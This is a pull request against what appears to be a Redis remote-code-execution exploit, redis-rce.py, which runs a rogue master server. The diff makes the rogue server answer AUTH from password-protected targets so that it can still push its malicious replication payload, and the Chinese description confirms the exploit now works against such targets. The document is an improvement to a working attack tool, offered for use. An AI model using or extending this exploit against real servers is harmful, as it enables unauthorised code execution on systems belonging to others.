### PR TITLE
fix auth bug when target is enable auth

### DIFF
--- a/redis-rce.py
+++ b/redis-rce.py
@@ -115,12 +115,15 @@ class RogueServer:
         elif data.find("REPLCONF") > -1:
             resp = "+OK" + CLRF
             phase = 2
+        elif data.find("AUTH") > -1:
+            resp = "+OK" + CLRF
+            phase = 3
         elif data.find("PSYNC") > -1 or data.find("SYNC") > -1:
             resp = "+FULLRESYNC " + "Z" * 40 + " 0" + CLRF
             resp += "$" + str(len(payload)) + CLRF
             resp = resp.encode()
             resp += payload + CLRF.encode()
-            phase = 3
+            phase = 4
         return resp, phase
 
     def close(self):
@@ -136,7 +139,7 @@ class RogueServer:
                     break
                 resp, phase = self.handle(data)
                 dout(cli, resp)
-                if phase == 3:
+                if phase == 4:
                     break
         except Exception as e:
             print("\033[1;31;m[-]\033[0m Error: {}, exit".format(e))


### PR DESCRIPTION
修复了一个 bug 当目标 redis 启用 auth 时，目标连接至 rogue server 也会发送 AUTH 导致 rogue server 无法发送 FULLRESYNC 同步恶意 payload
![image](https://user-images.githubusercontent.com/11347901/65147023-d148ee00-da4f-11e9-80bb-62387f56c0fa.png)

修复完成后可以正常工作
![image](https://user-images.githubusercontent.com/11347901/65147206-3c92c000-da50-11e9-8e1e-fa31784f0346.png)
